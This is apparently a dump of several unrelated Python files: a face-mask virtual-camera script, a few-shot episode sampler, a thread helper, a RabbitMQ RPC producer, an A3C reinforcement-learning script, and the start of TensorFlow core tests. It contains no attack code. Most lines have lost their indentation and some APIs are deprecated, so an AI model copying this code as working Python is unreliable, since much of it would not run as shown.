if not vcam.isOpened():
raise RuntimeError('Could not open video source')
#Settings for virtual camera
pref_width = 1280
pref_height = 720
pref_fps_in = 30
vcam.set(cv2.CAP_PROP_FRAME_WIDTH, pref_width)
vcam.set(cv2.CAP_PROP_FRAME_HEIGHT, pref_height)
vcam.set(cv2.CAP_PROP_FPS, pref_fps_in)
width = int(vcam.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vcam.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps_in = vcam.get(cv2.CAP_PROP_FPS)
print(f'Webcam capture started ({width}x{height} @ {fps_in}fps)') # Prints fps of vcam
###### CUSTOM CHANGES CAN BE MADE HERE #######
images=['Images/mask1.png','Images/mask2.png','Images/mask3.png','Images/mask4.png']
mask_img = cv2.imread(images[0],cv2.IMREAD_UNCHANGED) #### Change this Image to any Eye wear of your choice
colorsavailable=[(255,255,255),(0,255,255),(0,0,255),(255,0,255),(0,0,255),(0,0,0),(100,20,100),(208, 253, 255)]
chooseColor=colorsavailable[0]
bgColor=colorsavailable[6]
##############################################
fps_out = 20
with pyvirtualcam.Camera(width, height, fps_out, fmt=PixelFormat.BGR, print_fps=fps_in) as cam:
print(f'Virtual cam started: {cam.device} ({cam.width}x{cam.height} @ {cam.fps}fps)')
while True:
            ret, frame = vcam.read()
            if not ret:
                raise RuntimeError('Error fetching frame')
            faces=face_cascade.detectMultiScale(frame, 1.2, 5, 0, (120, 120), (350, 350)) #Detecting face using face cascade
# Send to virtual cam.
            img = np.full((480, 640, 3), bgColor, np.uint8) # Making a plain canvas with specific solid color
face_mesh = mp_face_mesh.FaceMesh(
static_image_mode=True,
max_num_faces=1,
min_detection_confidence=0.5)
results = face_mesh.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)) # Landmarks stored here
drawing_spec = mp_drawing.DrawingSpec(color=chooseColor,thickness=1, circle_radius=0)
if not results.multi_face_landmarks:
continue
for face_landmarks in results.multi_face_landmarks:
#print('face_landmarks:', face_landmarks)
mp_drawing.draw_landmarks(
image=img,
landmark_list=face_landmarks,
connections=mp_face_mesh.FACE_CONNECTIONS,
landmark_drawing_spec=drawing_spec,
connection_drawing_spec=drawing_spec)
for ids,landmrk in enumerate(face_landmarks.landmark):
#print(landmrk,ids)
# 25 is for left eye and 339 is for right eye
if ids == 25:
#cv2.putText(img, str(ids), (int(landmrk.x*640),int(landmrk.y*480)), cv2.FONT_HERSHEY_SIMPLEX,0.1, (255,0,255), 1, cv2.LINE_AA)
x1=landmrk.x*640
y1=landmrk.y*480
if ids == 339:
x2=landmrk.x*640
y2=landmrk.y*480
# getting size of canvas and mask image used
hf,wf,cf=img.shape
hb,wb,cb=mask_img.shape
mask_img=cv2.resize(mask_img, (int(x2-x1)+100, int(y2-y1)+100),interpolation=cv2.INTER_AREA)
#try and except used because it causes error when head is not detected
try:
img = cv.overlayPNG(img,mask_img,[int(x1)-40,int(y1)-70])
except:
pass
# Retrieve the detected text from takesinput process
fh = open("Utils/words.txt","r")
text=fh.read()
fh.close()
text = "Captions : " + text
# Place it on canvas
img = cv2.putText(img, str(text), (20,400), cv2.FONT_HERSHEY_SIMPLEX,0.5, (0,0,255), 1, cv2.LINE_AA)
#cv2.imshow("image", img)
cam.send(img)
if cv2.waitKey(1) == ord('q'):
break
# Wait until it's time for the next frame.
cam.sleep_until_next_frame()
# Running 2 processes using multiprocessing
p1 = multiprocessing.Process(target=takesinput)
p2 = multiprocessing.Process(target=program)
if __name__ == '__main__':
p1.start() # Starting both process
p2.start()
|
parallel_sampler.py
|
import time
import datetime
from multiprocessing import Process, Queue, cpu_count
import torch
import numpy as np
# from pytorch_transformers import BertModel
from transformers import BertModel
import dataset.utils as utils
import dataset.stats as stats
class ParallelSampler():
def __init__(self, data, args, num_episodes=None, DA=None):
self.data = data
self.args = args
self.num_episodes = num_episodes
self.DA = DA
self.all_classes = np.unique(self.data['label'])
self.num_classes = len(self.all_classes)
if self.num_classes < self.args.way:
raise ValueError("Total number of classes is less than #way.")
self.idx_list = []
for y in self.all_classes:
self.idx_list.append(
np.squeeze(np.argwhere(self.data['label'] == y)))
self.count = 0
self.done_queue = Queue()
        self.num_cores = cpu_count() if args.n_workers == 0 else args.n_workers
self.p_list = []
for i in range(self.num_cores):
self.p_list.append(
Process(target=self.worker, args=(self.done_queue,)))
for i in range(self.num_cores):
self.p_list[i].start()
def get_epoch(self):
for _ in range(self.num_episodes):
# wait until self.thread finishes
support, query = self.done_queue.get()
# convert to torch.tensor
support = utils.to_tensor(support, self.args.cuda, ['raw'])
query = utils.to_tensor(query, self.args.cuda, ['raw'])
if self.args.meta_w_target:
if self.args.meta_target_entropy:
w = stats.get_w_target(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
else: # use rr approxmation (this one is faster)
w = stats.get_w_target_rr(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
support['w_target'] = w.detach()
query['w_target'] = w.detach()
support['is_support'] = True
query['is_support'] = False
yield support, query
def worker(self, done_queue):
'''
Generate one task (support and query).
Store into self.support[self.cur] and self.query[self.cur]
'''
while True:
if done_queue.qsize() > 100:
time.sleep(1)
continue
# sample ways
sampled_classes = np.random.permutation(
self.num_classes)[:self.args.way]
source_classes = []
for j in range(self.num_classes):
if j not in sampled_classes:
source_classes.append(self.all_classes[j])
source_classes = sorted(source_classes)
# sample examples
support_idx, query_idx = [], []
for y in sampled_classes:
tmp = np.random.permutation(len(self.idx_list[y]))
support_idx.append(
self.idx_list[y][tmp[:self.args.shot]])
query_idx.append(
self.idx_list[y][
tmp[self.args.shot:self.args.shot+self.args.query]])
support_idx = np.concatenate(support_idx)
query_idx = np.concatenate(query_idx)
if self.args.mode == 'finetune' and len(query_idx) == 0:
query_idx = support_idx
# aggregate examples
max_support_len = np.max(self.data['text_len'][support_idx])
max_query_len = np.max(self.data['text_len'][query_idx])
support_DA = self.DA if self.args.use_support_DA else None
query_DA = self.DA if self.args.use_query_DA else None
support = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
support_idx, max_support_len, support_DA, self.args.aug_mode)
query = utils.select_subset(self.data, {}, ['text', 'text_len', 'label'],
query_idx, max_query_len, query_DA, self.args.aug_mode)
if self.args.embedding in ['idf', 'meta', 'meta_mlp']:
# compute inverse document frequency over the meta-train set
idf = stats.get_idf(self.data, source_classes)
support['idf'] = idf
query['idf'] = idf
if self.args.embedding in ['iwf', 'meta', 'meta_mlp']:
# compute SIF over the meta-train set
iwf = stats.get_iwf(self.data, source_classes)
support['iwf'] = iwf
query['iwf'] = iwf
if 'pos' in self.args.auxiliary:
support = utils.select_subset(
self.data, support, ['head', 'tail'], support_idx)
query = utils.select_subset(
self.data, query, ['head', 'tail'], query_idx)
done_queue.put((support, query))
def __del__(self):
'''
Need to terminate the processes when deleting the object
'''
for i in range(self.num_cores):
self.p_list[i].terminate()
del self.done_queue
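# Worked, numpy-only example of the episode sampling that ParallelSampler.worker
# performs (illustrative, independent of the class above): pick `way` classes at
# random, then split each class's indices into `shot` support and `query` query examples.
def _sample_episode_indices(labels, way, shot, query):
    classes = np.unique(labels)
    sampled_classes = np.random.permutation(len(classes))[:way]
    support_idx, query_idx = [], []
    for y in sampled_classes:
        idx = np.squeeze(np.argwhere(labels == classes[y]))
        perm = np.random.permutation(len(idx))
        support_idx.append(idx[perm[:shot]])
        query_idx.append(idx[perm[shot:shot + query]])
    return np.concatenate(support_idx), np.concatenate(query_idx)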
|
threads.py
|
import threading
class crackcoinThreader(object):
""" Threading class for crackcoin """
def __init__(self):
self.threads = []
def startBackgroundThread(self, method, args = False):
''' Start new thread '''
if args:
newThread = threading.Thread(target=method, args=args)
else:
newThread = threading.Thread(target=method)
newThread.start()
self.threads.append(newThread)
def waitForThreads(self, timeout = 10.00):
        ''' Wait for each started thread to finish, up to `timeout` seconds per thread '''
for thread in self.threads:
thread.join(timeout)
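# Minimal usage sketch (illustrative): run a worker function in the background and
# then wait for it to finish. The demo_worker function and its argument are made up.
if __name__ == '__main__':
    import time

    def demo_worker(name):
        print('worker %s started' % name)
        time.sleep(1)
        print('worker %s done' % name)

    threader = crackcoinThreader()
    threader.startBackgroundThread(demo_worker, args=('demo',))
    threader.waitForThreads(timeout=5.0)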
|
rpc_queue_producer.py
|
#!/usr/bin/env python
import pika
import uuid
import os
import time
import threading
import logging
MQ_HOST = os.environ.get('MQ_HOST')
class RpcProducer(object):
def __init__(self, timeout):
self.logger = logging.getLogger(__name__)
self.connection = pika.BlockingConnection(
pika.ConnectionParameters(host=MQ_HOST))
self.channel = self.connection.channel()
self.timeout = timeout
self.exchange_name = ''
t1 = threading.Thread(target=self.keep_live, args=())
t1.start()
result = self.channel.queue_declare(queue='', exclusive=True)
self.callback_queue = result.method.queue
self.channel.basic_consume(queue=self.callback_queue,
on_message_callback=self.on_response,
auto_ack=True)
def keep_live(self):
while True:
time.sleep(30)
msg = "[MQ]: Heart Beat"
self.logger.debug("Sending heart beat msg.")
self.call(msg)
def on_response(self, ch, method, props, body):
if self.corr_id == props.correlation_id:
self.response = body
def call(self, body):
# if not self.connection or self.connection.is_closed:
# # print("Reopening connection...")
# self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=MQ_HOST))
# self.channel = self.connection.channel()
# # print("Connection reopened.")
# # channel.exchange_declare(exchange=self.exchange_name)
self.response = None
self.corr_id = str(uuid.uuid4())
self.channel.basic_publish(exchange='',
routing_key='rpc_queue',
properties=pika.BasicProperties(
reply_to=self.callback_queue,
correlation_id=self.corr_id,
),
body=str(body))
timer = 0
while self.response is None:
time.sleep(1)
timer += 1
if timer == self.timeout:
return "No response from MQ receiver"
self.connection.process_data_events()
# self.channel.close()
return self.response
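# Illustrative sketch of the matching consumer side (not part of this module): a
# worker that reads from 'rpc_queue' and replies to the producer's exclusive callback
# queue using the reply_to / correlation_id properties set by call() above.
def example_consumer():
    connection = pika.BlockingConnection(pika.ConnectionParameters(host=MQ_HOST))
    channel = connection.channel()
    channel.queue_declare(queue='rpc_queue')

    def on_request(ch, method, props, body):
        response = "echo: " + body.decode()
        ch.basic_publish(exchange='',
                         routing_key=props.reply_to,
                         properties=pika.BasicProperties(correlation_id=props.correlation_id),
                         body=response)
        ch.basic_ack(delivery_tag=method.delivery_tag)

    channel.basic_consume(queue='rpc_queue', on_message_callback=on_request)
    channel.start_consuming()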
if __name__ == "__main__":
    rpc = RpcProducer(timeout=10)  # RpcProducer requires a timeout (seconds); 10 is an illustrative value
    body = "test body"
    print("Published Message: {}".format(body))
    response = rpc.call(body)
    print(" [.] Got response: " + str(response))
|
A3C.py
|
"""
Asynchronous Advantage Actor Critic (A3C), Reinforcement Learning.
The BipedalWalker example.
Using:
tensorflow
gym
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
GAME = 'BipedalWalker-v2'
OUTPUT_GRAPH = False
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 8000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.99
ENTROPY_BETA = 0.005
LR_A = 0.00005 # learning rate for actor
LR_C = 0.0001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
del env
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self._build_net()
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v = self._build_net()
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
self.test = sigma[0]
mu, sigma = mu * A_BOUND[1], sigma + 1e-5
normal_dist = tf.contrib.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his)
exp_v = log_prob * td
entropy = normal_dist.entropy() # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1)), *A_BOUND)
with tf.name_scope('local_grad'):
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self):
w_init = tf.contrib.layers.xavier_initializer()
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 500, tf.nn.relu6, kernel_initializer=w_init, name='la')
l_a = tf.layers.dense(l_a, 300, tf.nn.relu6, kernel_initializer=w_init, name='la2')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 500, tf.nn.relu6, kernel_initializer=w_init, name='lc')
l_c = tf.layers.dense(l_c, 300, tf.nn.relu6, kernel_initializer=w_init, name='lc2')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
return mu, sigma, v
def update_global(self, feed_dict): # run by a local
_, _, t = SESS.run([self.update_a_op, self.update_c_op, self.test], feed_dict) # local grads applies to global net
return t
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME)
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
while True:
if self.name == 'W_0' and total_step % 30 == 0:
self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if r == -100: r = -2
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
test = self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
achieve = '| Achieve' if self.env.unwrapped.hull.position[0] >= 88 else '| -------'
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.95 * GLOBAL_RUNNING_R[-1] + 0.05 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
achieve,
"| Pos: %i" % self.env.unwrapped.hull.position[0],
"| RR: %.1f" % GLOBAL_RUNNING_R[-1],
'| EpR: %.1f' % ep_r,
'| var:', test,
)
GLOBAL_EP += 1
break
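# Illustrative helper (not used by the classes above): computes the same n-step
# discounted targets that Worker.work builds by walking buffer_r in reverse and
# bootstrapping from the critic's value of the last state.
def discounted_targets(rewards, bootstrap_value, gamma=GAMMA):
    targets = []
    v = bootstrap_value
    for r in rewards[::-1]:
        v = r + gamma * v
        targets.append(v)
    targets.reverse()
    return targets
# Example: discounted_targets([1.0, 1.0, 1.0], 0.5) -> approximately [3.455, 2.480, 1.495]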
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
import matplotlib.pyplot as plt
plt.plot(GLOBAL_RUNNING_R)
plt.xlabel('episode')
plt.ylabel('global running reward')
plt.show()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:GPU:0')
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
